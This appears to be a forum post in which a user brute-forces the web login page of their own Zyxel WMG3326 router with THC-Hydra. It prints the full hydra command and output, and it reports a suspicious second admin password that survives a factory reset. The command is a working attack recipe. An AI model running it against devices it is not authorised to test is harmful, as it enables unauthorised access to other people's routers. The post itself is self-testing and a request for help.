after seeing one post about routers i became interested about my own.
it is a zyxel wmg3326-d20a and i found out that its web configuration page were accessible through internet, next thing to do was learning about its rate limiting of logins. i found out that it has no rate limiting at all, so i downloaded THC-Hydra, online login cracker and ran it against my routers login page.
Code:
[root@slackbox ville]# hydra 192.168.10.1 http-form-post "/login.cgi:UserName=^USER^&password=^PASS^&hiddenPassword=^PASS^&submitValue=1:The username or password is not correct" -l admin -P /root/passwords.txt
Hydra v8.1-dev (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2014-11-08 08:27:00
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2151221 login tries (l:1/p:2151221), ~8403 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 192.168.10.1 login: admin password: !/.,1;*$@_-
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-11-08 08:27:17
[root@slackbox ville]# wc -l /root/passwords.txt
2151221 /root/passwords.txt
[root@slackbox ville]#
it took about 10 seconds to crack it, the most worrying point is that that admin account has wrong password, it isnt mine, my own password for admin works also.
any thoughts? i have resetted it to factory defaults but that wrong admin pass works still. the response my router gives is :
but the page it gives is blank.
i tried to deny access to login page thru net but havent still found out how i should do it.
